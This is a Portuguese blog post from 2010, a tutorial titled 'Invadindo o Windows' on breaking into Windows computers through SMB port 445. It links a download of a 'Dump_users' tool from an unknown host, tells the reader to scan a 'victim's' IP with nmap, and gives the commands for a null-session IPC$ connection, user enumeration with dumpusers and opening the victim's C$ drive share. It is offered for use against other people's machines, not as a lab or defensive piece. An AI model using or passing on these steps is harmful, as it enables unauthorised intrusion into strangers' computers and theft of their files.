domingo, 12 de dezembro de 2010

Invadindo o Windows

Neste tutorial vamos aprender a invadir o windows pela porta 445.

Mais sobre a porta 445
- A porta TCP 445 é do SMB (Server Message Block), que serve para compartilhamento de arquivos. A partir do Windows 2000, a Microsoft trocou as famosas TCP 139 e UDP 137-138, fazendo o SMB trafegar direto em cima do TCP/IP, pela 445. Ou seja, na sua rede interna, é um mal necessário. Já no firewall, na saída para Internet, deve ser fechada sempre, tanto inbound quanto outbound.

Como saber se a porta 445 está aberta
Muito simples digite netstat -an na cmd e aparecerá suas conexões ativas.

Programas utilizados
- Dump users:
http://unknow-ro0t.freeweb7.com/Dump_users.rar
Depois de baixar o dumpusers extraia ele para a pasta windows.


- Zenmap.org

http://www.superdownloads.com.br/download/109/nmap/
Agora que você baixou o nmap scaneie o IP da vítima e veja se a tal porta 445 está aberta.


Como efetura a invasão

Vamos dizer que (xxx.xxx.xxx.xxx) é o IP da vítima,para saber se este IP é do brasil basta que você olhe os números iniciais que são chamados ranges, que são utilizados para definir de onde é um certo indereço de IP.

1. Vá até a prompt de comando e didigte:
net use \\xxx.xxx.xxx.xxx\ipc$ "" /u:""

2. Abra outra CMD e digite:
dumpusers -target xxx.xxx.xxx.xxx -type notdc -start 1 -stop 900 -mode verbose

3. Abra o executar e digte:

iniciar>executar>\\xxx.xxx.xxx.xxx\c$

Pronto,agora o disco local da vítima está shared com você.

0 comentários:

Postar um comentário

Proibido palavras ofensivas, racistas ou descriminatórias.

[Seu Comentário será liberado no máximo em 24horas]